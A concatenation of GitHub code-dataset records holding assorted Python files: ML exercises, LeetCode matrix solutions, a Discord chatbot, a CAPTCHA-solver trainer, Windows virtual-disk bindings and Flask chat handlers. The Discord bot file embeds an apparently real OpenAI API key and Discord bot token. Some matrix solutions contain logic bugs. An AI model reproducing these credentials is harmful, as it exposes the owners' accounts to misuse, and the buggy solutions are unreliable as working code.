print(np.dot(ug1, beta))\n\n Xn = normalize(X, X)\n plt.figure(\"Girl, mom, Feature normalization\")\n plt.scatter(Xn[:, 0], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n plt.figure(\"Girl, dad, Feature normalization\")\n plt.scatter(Xn[:, 1], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n Xne = extend_matrix(Xn)\n beta_n = normal_eq(Xne, y)\n print(beta_n)\n print(cost(Xne, y, beta_n))\n ug1_n = normalize(np.array([65, 70]), X)\n print(np.dot(np.append([1], ug1_n), beta_n))\n # exit()\n print()\n print()\n print()\n\n # Gradient descent on non-normalized X\n # res = gradient_descent(Xe, y, a = 0.0002, n = 20000000)\n \n # Gradient descent on normalized X\n beta_gradient = gradient_descent(Xne, y, a = 0.05, n = 200, plot = True)\n print(\"Normalization, gradient descent:\")\n print(\" Height:\", np.dot(np.append([1], ug1_n), beta_gradient))\n print(\" Cost: \", cost(Xne, y, beta_gradient))\n\n\n\n\n plt.show()\n # print(cost(Xe, y, beta))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exerciseA.py","file_name":"exerciseA.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31065001016","text":"import collections\nfrom typing import List\n\n\ndef longest1():\n def longestLine(M: List[List[int]]) -> int:\n row = collections.defaultdict(int)\n col = collections.defaultdict(int)\n ad = collections.defaultdict(int) # Ascending diagonal\n dd = collections.defaultdict(int) # Descending diagonal\n mx = 0\n for i in range(len(M)):\n for j in range(len(M[0])):\n if not 
M[i][j]:\n row[i] = col[j] = ad[j + i] = dd[j - i] = 0\n else:\n row[i] += 1\n col[j] += 1\n ad[j + i] += 1\n dd[j - i] += 1\n mx = max(mx, row[i], col[j], ad[j + i], dd[j - i])\n return mx\n\n mat = [[0, 1, 1, 0], [0, 1, 1, 0], [0, 0, 0, 1]]\n longestLine(mat)\n\n\ndef max_connected_island():\n def maxAreaOfIsland(grid: List[List[int]]) -> int:\n\n def explore(grid, r, c) -> int:\n if r >= len(grid) or r < 0 or c >= len(grid[0]) or col < 0:\n return 0\n if grid[r][c] == 0:\n return 0\n grid[r][c] = 0\n return 1 + explore(grid, r - 1, c) + explore(grid, r, c - 1) + explore(grid, r + 1, c) + explore(grid, r, c + 1)\n\n row = len(grid)\n col = len(grid[0])\n max_area = 0\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 1:\n max_area = max(max_area, explore(grid, i, j))\n return max_area\n\n print(maxAreaOfIsland(grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,1,1,0,1,0,0,0,0,0,0,0,0],[0,1,0,0,1,1,0,0,1,0,1,0,0],[0,1,0,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,0,0,0,0,0,0,1,1,0,0,0,0]]))\n\ndef robot_clean():\n def cleanRoom(robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, 0, 0, 0, 1, set())\n\n def dfs(robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n\n room = [[1, 1, 1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 1, 0, 1, 1], [1, 0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1]]\n cleanRoom(room)\n\n\nclass Solution:\n def cleanRoom(self, robot):\n def dfs( robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n dfs(robot, 0, 0, 0, 1, set())\n\n\ndef max_min_mat():\n seen = set()\n res=[]\n\n def maximumMinimumPath(grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j):\n queue = collections.deque([(i,j),])\n temp=[]\n\n while queue:\n m,n = queue.popleft()\n temp.append(grid[m][n])\n seen.add((m, n))\n for r, c in (m + 1, n), (m - 1, n), (m, n + 1), (m, n - 1):\n if r>=len(grid[0]) or r<0 or c>=len(grid[0]) or c<0:\n continue\n elif r == len(grid)-1 and c==len(grid[0])-1:\n if res and sum(temp) > sum(res[-1]):\n res.append(temp)\n elif not res:\n res.append(temp)\n elif (r,c) not in seen:\n seen.add((r,c))\n queue.append((r,c))\n\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i,j) not in seen:\n dfs(grid, i, j)\n max_sum=0\n idx = 0\n for j, i in enumerate(res):\n if sum(i)>max_sum:\n idx = j\n max_sum = sum(i)\n print(\"Res \", res)\n return min(res[idx])\n\n grid = [[5, 4, 5], [1, 2, 6], [7, 4, 6]]\n print(maximumMinimumPath(grid))\n\ndef shortest_path():\n def shortestPathBinaryMatrix( grid: List[List[int]]) -> int:\n max_row = len(grid) - 1\n max_col = len(grid[0]) - 1\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n\n # Helper 
function to find the neighbors of a given cell.\n def get_neighbours(row, col):\n for row_difference, col_difference in directions:\n new_row = row + row_difference\n new_col = col + col_difference\n if not (0 <= new_row <= max_row and 0 <= new_col <= max_col):\n continue\n if grid[new_row][new_col] != 0:\n continue\n yield (new_row, new_col)\n\n # Check that the first and last cells are open.\n if grid[0][0] != 0 or grid[max_row][max_col] != 0:\n return -1\n\n # Set up the BFS.\n queue = collections.deque()\n queue.append((0, 0))\n grid[0][0] = 1\n\n # Carry out the BFS.\n while queue:\n row, col = queue.popleft()\n distance = grid[row][col]\n if (row, col) == (max_row, max_col):\n return distance\n for neighbour_row, neighbour_col in get_neighbours(row, col):\n grid[neighbour_row][neighbour_col] = distance + 1\n queue.append((neighbour_row, neighbour_col))\n\n # There was no path.\n return -1\n\n grid = [[0, 0, 0], [1, 1, 0], [1, 1, 0]]\n print(shortestPathBinaryMatrix(grid))\n\nshortest_path()\n","repo_name":"arpith-kp/interviewrelated","sub_path":"leetcode_matrix.py","file_name":"leetcode_matrix.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31314275247","text":"import sys\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport pdb\nimport matplotlib as mpl\nmpl.use('Agg')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import seed\nfrom utils.ml_utils import update_check\n\nIMG_PATH = '/home/ubuntu/workspace/finance/app/static/img/ml_imgs/'\n\nclass AdalineSGD(object):\n \"\"\"ADAptive LInear NEuron classifier.\n\n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n\n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n errors_ : list\n Number of misclassifications in every epoch.\n shuffle : bool (default: True)\n Shuffles training data every epoch if True to prevent cycles.\n random_state : int (default: None)\n Set random state for shuffling and initializing the weights.\n \n \"\"\"\n def __init__(self, eta=0.01, n_iter=10, shuffle=True, random_state=None):\n self.eta = eta\n self.n_iter = n_iter\n self.w_initialized = False\n self.shuffle = shuffle\n if random_state:\n seed(random_state)\n \n def fit(self, X, y):\n \"\"\" Fit training data.\n\n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n\n Returns\n -------\n self : object\n\n \"\"\"\n self._initialize_weights(X.shape[1])\n self.cost_ = []\n for i in range(self.n_iter):\n # data needs to be presented in random order\n if self.shuffle:\n X, y = self._shuffle(X, y)\n cost = []\n for xi, target in zip(X, y):\n # update weights \"on-the-fly\" after each sample unlike regular adaline gradient descent\n # Other than that, very similar to adalineGD\n cost.append(self._update_weights(xi, target))\n avg_cost = sum(cost)/len(y)\n self.cost_.append(avg_cost)\n return self\n\n def partial_fit(self, X, y):\n \"\"\"Fit training data without reinitializing the weights\"\"\"\n # This can be used to continue learning on a model after weights have already been tuned to some extent\n if not self.w_initialized:\n self._initialize_weights(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, 
y):\n self._update_weights(xi, target)\n else:\n self._update_weights(X, y)\n return self\n\n def _shuffle(self, X, y):\n \"\"\"Shuffle training data\"\"\"\n r = np.random.permutation(len(y))\n return X[r], y[r]\n \n def _initialize_weights(self, m):\n \"\"\"Initialize weights to zeros\"\"\"\n self.w_ = np.zeros(1 + m)\n self.w_initialized = True\n \n def _update_weights(self, xi, target):\n \"\"\"Apply Adaline learning rule to update the weights\"\"\"\n output = self.net_input(xi)\n error = (target - output)\n # Same as adalineGD where the weights are updated even if prediction is right\n self.w_[1:] += self.eta * xi.dot(error)\n self.w_[0] += self.eta * error\n cost = 0.5 * error**2\n print(str(self.w_) + \"----\" + str(xi))\n return cost\n \n def net_input(self, X):\n \"\"\"Calculate net input\"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def activation(self, X):\n \"\"\"Compute linear activation\"\"\"\n return self.net_input(X)\n\n def predict(self, X):\n \"\"\"Return class label after unit step\"\"\"\n return np.where(self.activation(X) >= 0.0, 1, -1)","repo_name":"mccarvik/python_for_finance","sub_path":"research/ml_analysis/algorithms/adalinesgd.py","file_name":"adalinesgd.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39113736503","text":"import os\nimport discord\nfrom discord.ext import commands\n\n\nimport openai\nimport discord\nfrom discord.ext import commands\n\n# OpenAI API anahtarı ve Discord bot token'ı\nopenai.api_key = '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'\n\n# Discord bot token'ı\n# Discord Intents ayarı\nintents = discord.Intents.default()\nintents.messages = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='kodland!', intents=intents)\n\n# Sohbet oturumu için bir dictionary yapısı.\nchat_sessions = {}\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has connected to Discord!')\n\n@bot.command(name='chat')\nasync def chat(ctx, *, message):\n user_id = str(ctx.author.id)\n\n # Kullanıcının mevcut oturum ID'sini al.\n session_id = chat_sessions.get(user_id)\n\n # Kullanıcının mesajı ile bir mesaj listesi oluştur.\n messages = [\n {\"role\": \"system\", \"content\": \"senin adın Kodland Canlı Destek ve yardım sever bir asistansın, birisi sana adını sorduğunda adım Kodland Canlı Destek Demelisin\"},\n {\"role\": \"user\", \"content\": message}\n ]\n\n # ChatCompletion çağrısı yaparken session_id varsa ekleyin.\n chat_params = {\n \"model\": \"gpt-4\",\n \"messages\": messages\n }\n\n if session_id:\n chat_params[\"session_id\"] = session_id\n\n # ChatCompletion çağrısı.\n response = openai.ChatCompletion.create(**chat_params)\n\n # Cevabı ve yeni oturum ID'sini kaydet.\n # 'choices' içerisinden 'data' ve oradan da 'session_id' anahtarına ulaşılır.\n if 'data' in response['choices'][0]:\n chat_sessions[user_id] = response['choices'][0]['data']['session_id']\n else:\n # İlk yanıtta session_id yoksa, bu bir başlangıç yanıtıdır ve oturum ID'si henüz oluşturulmamış olabilir.\n # Bu durumda, bu kullanıcı için henüz bir session_id yok demektir.\n pass\n\n answer = response['choices'][0]['message']['content']\n\n # Gelen yanıtı Discord'da gönder.\n await ctx.send(answer)\n\n# Botu 
çalıştır.\nbot.run(\"MTE3MDcyMjQwOTI0Mjk1MTgxMg.GaSf0x.OcM33sEBXjC65xUPicRy48Z65EQBOsF88SADsA\")\n\n","repo_name":"toprakefeeker/Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14805981861","text":"from flask_restful import fields\r\nfrom models.Usuario import usuario_campos\r\n\r\ngrupo_campos = {\r\n 'criador_id': fields.Integer(attribute=\"criador.id\"),\r\n 'dataCriacao': fields.DateTime,\r\n 'descricao': fields.String,\r\n 'participantes': fields.List(fields.Nested(usuario_campos))\r\n}\r\n\r\n'''\r\n Classe Grupo.\r\n'''\r\nclass Grupo():\r\n def __init__(self, criador, nome, dataCriacao, descricao):\r\n self.criador = criador\r\n self.nome = nome\r\n self.dataCriacao = dataCriacao\r\n self.descricao = descricao","repo_name":"RRFreitas/GeekWay","sub_path":"geekway-api/models/Grupo.py","file_name":"Grupo.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70235007528","text":"import encodings\n\nfrom django import template\nfrom django.template.defaultfilters import stringfilter\n\nregister = template.Library()\n\n\n@stringfilter\ndef rtflinebreaks(value):\n \"Converts newlines into RTF \\\\lines\"\n return value.replace(\"\\n\", \"{\\\\line}\")\n\n\nregister.filter(rtflinebreaks)\n\nencoder = encodings.codecs.getencoder(\"1252\")\n\n\ndef unicode_to_rtf(u):\n \"\"\"Replaces all high characters with \\\\u escape sequences,\n assuming a Windows 1252 code page\"\"\"\n # We will assume Windows code page for now (for maxiumum\n # likelihood of compatibility -- RTF only seems to support\n # the first 65535 chars of unicode anyway).\n # The document should have these codes\n # \\ansi\\ansicpg1252\\uc1\n output = []\n for char in u:\n if ord(char) > 127:\n try:\n encoded = encoder(char)\n except UnicodeEncodeError:\n encoded = encoder(\"?\")\n val = ord(encoded[0])\n if val < 256:\n # use \\' method:\n converted = \"\\\\'\" + hex(val)[2:]\n else:\n # Don't even know if this works. The\n # '?' 
is the alternate rendering, one byte long,\n # to match the '\\uc1' directive\n converted = \"\\\\u%d ?\" % val\n else:\n converted = str(char)\n output.append(converted)\n return \"\".join(output)\n\n\n@stringfilter\ndef rtfescape(value):\n \"Escapes RTF control characters\"\n\n return unicode_to_rtf(value.replace(\"\\\\\", \"\\\\\\\\\").replace(\"{\", \"\\\\{\").replace(\"}\", \"\\\\}\"))\n\n\nregister.filter(rtfescape)\n","repo_name":"cciw-uk/cciw.co.uk","sub_path":"cciw/officers/templatetags/rtf.py","file_name":"rtf.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22112460333","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom trainer_gui import Ui_MainWindow\nfrom jcaptcha_image import JCaptchaImage, JCaptchaCharacterImage\nimport os, sys\n\n\nclass MessageBox:\n\tdef showMessage_trainingComplete(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('All training data collected and Model trained successfully!')\n\t\tmsg.setWindowTitle('Training complete!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n\tdef showMessage_emptyTextBox(form):\n\t\tmsg = QtWidgets.QMessageBox(form)\n\t\tmsg.setText('Invalid input data!')\n\t\tmsg.setWindowTitle('Try again!')\n\t\tmsg.setWindowIcon(QtGui.QIcon('icon/robot.ico'))\n\t\tmsg.exec_()\n\n#-------------------------\n\n\nclass TrainerApp:\n\tdef __init__(self):\n\t\tself.images_filenames = os.listdir('Training Images')\n\t\tself.imageName_index = 0\n\t\tself.training_X_outputFile = open('Collected Training Data/training_X.csv', 'w')\n\t\tself.training_Y_outputFile = open('Collected Training Data/training_Y.csv', 'w')\n\t\t#------------------------------\n\t\tapp = QtWidgets.QApplication(sys.argv)\n\t\tself.MainWindow = QtWidgets.QMainWindow()\n\t\tself.UI = Ui_MainWindow()\n\t\tself.UI.setupUi(self.MainWindow, self)\n\t\t#\n\t\tself.__remainingCount = len(self.images_filenames)\n\t\tself.__failedCount = 0\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\tself.UI.failed_label.setText('Failed: 0')\n\t\t#\n\t\tself.MainWindow.show()\n\t\tsys.exit(app.exec_())\n\n\tdef storeTrainingData(self):\n\t\tif self.UI.answer_lineEdit.text() == '':\n\t\t\tMessageBox.showMessage_emptyTextBox(self.MainWindow)\n\t\t\treturn\n\t\tif self.imageName_index + 1 >= len(self.images_filenames):\n\t\t\tMessageBox.showMessage_trainingComplete(self.MainWindow)\n\t\t\tself.training_X_outputFile.close()\n\t\t\tself.training_Y_outputFile.close()\n\t\t\treturn\n\t\t#------------------------------\n\t\timg = JCaptchaImage('Training Images/' + self.images_filenames[self.imageName_index])\n\t\timg.treat()\n\t\timg.collect_character_imageList()\n\t\tjcaptcha_char_images = img.get_JCaptchaCharacterImage_List()\n\t\tanswer_text = self.UI.answer_lineEdit.text()\n\t\t#------------------------------\n\t\ttraining_X = ''\n\t\ttraining_Y = ''\n\t\t#---\n\t\tif len(jcaptcha_char_images) != len(answer_text):\n\t\t\topen('log.txt', 'a').write('Issue with ' + self.images_filenames[self.imageName_index] + '\\n')\n\t\t\tself.__failedCount += 1\n\t\t\tself.__remainingCount -= 1\n\t\t\tself.UI.failed_label.setText('Failed: ' + str(self.__failedCount))\n\t\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\t\telse:\n\t\t\tfor i in range(len(jcaptcha_char_images)):\n\t\t\t\ttraining_X += jcaptcha_char_images[i].get_CSV() + '\\n'\n\t\t\t\ttraining_Y += answer_text[i] + 
'\\n'\n\t\t\tself.training_X_outputFile.write(training_X)\n\t\t\tself.training_Y_outputFile.write(training_Y)\n\t\t#------------------------------\n\t\tself.imageName_index += 1\n\t\tself.UI.captchaBox.setPixmap(QtGui.QPixmap(\"Training Images/\" + self.images_filenames[self.imageName_index]))\n\t\tself.UI.answer_lineEdit.setText('')\n\t\t#\n\t\tself.__remainingCount -= 1\n\t\tself.UI.remaining_label.setText('Remaining: ' + str(self.__remainingCount))\n\n\n#####\n#####\n#####\n\ndef main():\n\tif os.path.isfile('log.txt'):\n\t\tos.remove('log.txt')\n\ttrainer = TrainerApp()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"ali-sajjad-rizavi/JCaptcha-Solver","sub_path":"Training/trainer.pyw","file_name":"trainer.pyw","file_ext":"pyw","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"39795595010","text":"import ctypes\nfrom .wtypes import (\n BOOL,\n DWORD,\n GUID,\n LONG,\n POINTER,\n PVOID,\n PWSTR,\n ULARGE_INTEGER,\n ULONG,\n )\nfrom . import ref, fun_fact, raise_on_err\n\nfrom .kernel import KHANDLE, PKHANDLE\n\n_vdisk = ctypes.WinDLL(\"virtdisk.dll\")\n\n################################################################################\n\nATTACH_VIRTUAL_DISK_FLAG_NONE = 0\nATTACH_VIRTUAL_DISK_FLAG_READ_ONLY = 0x1\nATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER = 0x2\nATTACH_VIRTUAL_DISK_FLAG_PERMANENT_LIFETIME = 0x4\nATTACH_VIRTUAL_DISK_FLAG_NO_LOCAL_HOST = 0x8\nATTACH_VIRTUAL_DISK_FLAG_NO_SECURITY_DESCRIPTOR = 0x10\nATTACH_VIRTUAL_DISK_FLAG_BYPASS_DEFAULT_ENCRYPTION_POLICY = 0x20\nATTACH_VIRTUAL_DISK_FLAG_NON_PNP = 0x40\nATTACH_VIRTUAL_DISK_FLAG_RESTRICTED_RANGE = 0x80\nATTACH_VIRTUAL_DISK_FLAG_SINGLE_PARTITION = 0x100\nATTACH_VIRTUAL_DISK_FLAG_REGISTER_VOLUME = 0x200\n\nVIRTUAL_DISK_ACCESS_NONE = 0\nVIRTUAL_DISK_ACCESS_ATTACH_RO = 0x10000\nVIRTUAL_DISK_ACCESS_ATTACH_RW = 0x20000\nVIRTUAL_DISK_ACCESS_DETACH = 0x40000\nVIRTUAL_DISK_ACCESS_GET_INFO = 0x80000\nVIRTUAL_DISK_ACCESS_CREATE = 0x100000\nVIRTUAL_DISK_ACCESS_METAOPS = 0x200000\nVIRTUAL_DISK_ACCESS_READ = 0xd0000\nVIRTUAL_DISK_ACCESS_ALL = 0x3f0000\nVIRTUAL_DISK_ACCESS_WRITABLE = 0x320000\n\nOPEN_VIRTUAL_DISK_FLAG_NONE = 0\nOPEN_VIRTUAL_DISK_FLAG_NO_PARENTS = 0x1\nOPEN_VIRTUAL_DISK_FLAG_BLANK_FILE = 0x2\nOPEN_VIRTUAL_DISK_FLAG_BOOT_DRIVE = 0x4\nOPEN_VIRTUAL_DISK_FLAG_CACHED_IO = 0x8\nOPEN_VIRTUAL_DISK_FLAG_CUSTOM_DIFF_CHAIN = 0x10\nOPEN_VIRTUAL_DISK_FLAG_PARENT_CACHED_IO = 0x20\nOPEN_VIRTUAL_DISK_FLAG_VHDSET_FILE_ONLY = 0x40\nOPEN_VIRTUAL_DISK_FLAG_IGNORE_RELATIVE_PARENT_LOCATOR = 0x80\nOPEN_VIRTUAL_DISK_FLAG_NO_WRITE_HARDENING = 0x100\nOPEN_VIRTUAL_DISK_FLAG_SUPPORT_COMPRESSED_VOLUMES = 0x200\n\nOPEN_VIRTUAL_DISK_VERSION_UNSPECIFIED = 0\nOPEN_VIRTUAL_DISK_VERSION_1 = 1\nOPEN_VIRTUAL_DISK_VERSION_2 = 2\nOPEN_VIRTUAL_DISK_VERSION_3 = 3\n\nDETACH_VIRTUAL_DISK_FLAG_NONE = 0\n\nATTACH_VIRTUAL_DISK_VERSION_1 = 1\nATTACH_VIRTUAL_DISK_VERSION_2 = 2\n\n################################################################################\n\nclass VIRTUAL_STORAGE_TYPE(ctypes.Structure):\n _fields_ = (\n (\"DeviceId\", ULONG),\n (\"VendorId\", GUID),\n )\nPVIRTUAL_STORAGE_TYPE = POINTER(VIRTUAL_STORAGE_TYPE)\n\n################################################################################\n\nclass _OVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"RWDepth\", ULONG),\n )\n\nclass _OVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n )\n\nclass _OVDP_VERSION3(ctypes.Structure):\n 
_fields_ = (\n (\"GetInfoOnly\", BOOL),\n (\"ReadOnly\", BOOL),\n (\"ResiliencyGuid\", GUID),\n (\"SnapshotId\", GUID),\n )\n\nclass _OVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n (\"Version3\", _OVDP_VERSION3),\n )\n\nclass OPEN_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _OVDP_UNION))\n _anonymous_ = (\"u\",)\nPOPEN_VIRTUAL_DISK_PARAMETERS = POINTER(OPEN_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\nclass _AVDP_VERSION1(ctypes.Structure):\n _fields_ = (\n (\"Reserved\", ULONG),\n )\n\nclass _AVDP_VERSION2(ctypes.Structure):\n _fields_ = (\n (\"RestrictedOffset\", ULARGE_INTEGER),\n (\"RestrictedLength\", ULARGE_INTEGER),\n )\n\nclass _AVDP_UNION(ctypes.Union):\n _fields_ = (\n (\"Version1\", _OVDP_VERSION1),\n (\"Version2\", _OVDP_VERSION2),\n )\n\nclass ATTACH_VIRTUAL_DISK_PARAMETERS(ctypes.Structure):\n _fields_ = ((\"Version\", LONG), (\"u\", _AVDP_UNION))\n _anonymous_ = (\"u\",)\nPATTACH_VIRTUAL_DISK_PARAMETERS = POINTER(ATTACH_VIRTUAL_DISK_PARAMETERS)\n\n################################################################################\n\n_OpenVirtualDisk = fun_fact(\n _vdisk.OpenVirtualDisk, (\n DWORD,\n PVIRTUAL_STORAGE_TYPE,\n PWSTR,\n LONG,\n LONG,\n POPEN_VIRTUAL_DISK_PARAMETERS,\n PKHANDLE\n )\n )\n\ndef OpenVirtualDisk(storage_type, path, access_mask, flags, parameters=None):\n hdl = KHANDLE()\n raise_on_err(\n _OpenVirtualDisk(\n ref(storage_type),\n path,\n access_mask,\n flags,\n None if parameters is None else ref(parameters),\n ref(hdl)\n )\n )\n return hdl\n\n################################################################################\n\n_AttachVirtualDisk = fun_fact(\n _vdisk.AttachVirtualDisk, (\n DWORD,\n KHANDLE,\n PVOID, # no interest in supplying a security descriptor\n LONG,\n ULONG,\n PATTACH_VIRTUAL_DISK_PARAMETERS,\n PVOID, # no interest in supplying an overlapped\n )\n )\n\ndef AttachVirtualDisk(hdl, flags, prov_flags=0, parameters=None):\n raise_on_err(\n _AttachVirtualDisk(\n hdl,\n None,\n flags,\n prov_flags,\n None if parameters is None else ref(parameters),\n None\n )\n )\n\n################################################################################\n\n_DetachVirtualDisk = fun_fact(\n _vdisk.DetachVirtualDisk, (\n DWORD,\n KHANDLE,\n LONG,\n ULONG,\n )\n )\n\ndef DetachVirtualDisk(hdl, flags=0, prov_flags=0):\n raise_on_err(_DetachVirtualDisk(hdl, flags, prov_flags))\n\n################################################################################\n","repo_name":"RoccoMatano/ctwin32","sub_path":"ctwin32/virtdisk.py","file_name":"virtdisk.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"40432995887","text":"from flask_socketio import SocketIO, emit, join_room, leave_room\nfrom flask_login import current_user\nfrom app.models import db, Chat\nimport os\n\nif os.environ.get(\"FLASK_ENV\") == \"production\":\n origins = [\"http://yillow-app.herokuapp.com\", \"https://yillow-app.herokuapp.com\"]\nelse:\n origins = \"*\"\n\nsocketio = SocketIO(cors_allowed_origins=origins)\n\n@socketio.on(\"join\")\ndef on_join(channel_id):\n join_room(channel_id)\n\n@socketio.on(\"leave\")\ndef on_leave(channel_id):\n leave_room(channel_id)\n\n@socketio.on(\"chat\")\ndef handle_chat(data):\n channel_id = data['channel_id']\n user_id = data['user_id']\n message = data[\"message\"]\n 
created_at = data[\"created_at\"]\n\n new_chat = Chat(channel_id=channel_id, user_id=user_id, message=message, created_at=created_at)\n db.session.add(new_chat)\n db.session.commit()\n\n\n emit(\"chat\", new_chat.to_dict(),\\\n to=str(channel_id),\n broadcast=True)\n\n@socketio.on(\"edit\")\ndef handle_edit(data):\n chat_id = data[\"id\"]\n message = data[\"message\"]\n\n chat = Chat.query.get(chat_id)\n chat.message = message\n\n db.session.commit()\n\n emit(\"edit\", chat.to_dict(), to=str(chat.channel_id), broadcast=True)\n\n@socketio.on(\"delete\")\ndef handle_delete(chat_id):\n chat = Chat.query.get(chat_id)\n channel_id = str(chat.channel_id)\n\n db.session.delete(chat)\n db.session.commit()\n\n data = {\"chat_id\": chat_id, \"channel_id\": int(channel_id)}\n\n emit(\"delete\", data, to=channel_id, broadcast=True)\n","repo_name":"frances-y-h/yillow","sub_path":"app/socket.py","file_name":"socket.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"4662021490","text":"import csv\nimport json\nfrom shutil import rmtree\nfrom os import mkdir, path\n\n\ndef create_dir():\n mkdir('temp')\n\n\ndef remove_dir():\n rmtree('temp')\n\n\ndef csv_to_json(csv_file, json_file):\n arr = list()\n\n if path.exists(csv_file):\n with open(csv_file, encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for line in reader:\n arr.append(line)\n\n with open(json_file, 'w', encoding=\"utf8\") as f:\n indent = len(arr[0])\n conv = json.dumps(arr, indent=indent, ensure_ascii=False)\n f.write(conv)\n else:\n return \"CSV file doesn't exist!\"\n\n\n# def json_to_csv(csv_file, json_file):\n#\n return\n","repo_name":"kreker783/CSV-JSON-Converter","sub_path":"code/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2135336772","text":"N = int(input())\npeople = []\nfor _ in range(N):\n people.append(list(map(int, input().split())))\nfor i in people:\n rank = 1\n for j in people:\n if j[0] > i[0] and j[1] > i[1]:\n rank += 1\n print(rank, end=' ')\n","repo_name":"WoosubLeee/algorithm-study","sub_path":"백준/Silver/7568/7568_덩치.py","file_name":"7568_덩치.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24938891747","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-3, 1, 0.1)\ny1 = np.exp(4 * x)\ny2 = 2 * np.cos(3 * x)\ny3 = x ** 2 + 4\nplt.plot(x, y1, color=\"red\", linestyle=\":\", label=\"$y=e^{4x}$\")\nplt.plot(x, y2, color=\"blue\", label=\"$y=2\\cos(3x)$\")\nplt.plot(x, y3, color=\"forestgreen\", linestyle=\"--\", label=\"$y=x^2+4$\")\nplt.xticks(np.arange(-3, 2))\nplt.yticks(np.arange(0, 40, 5))\nplt.title(\"Wykres trzech 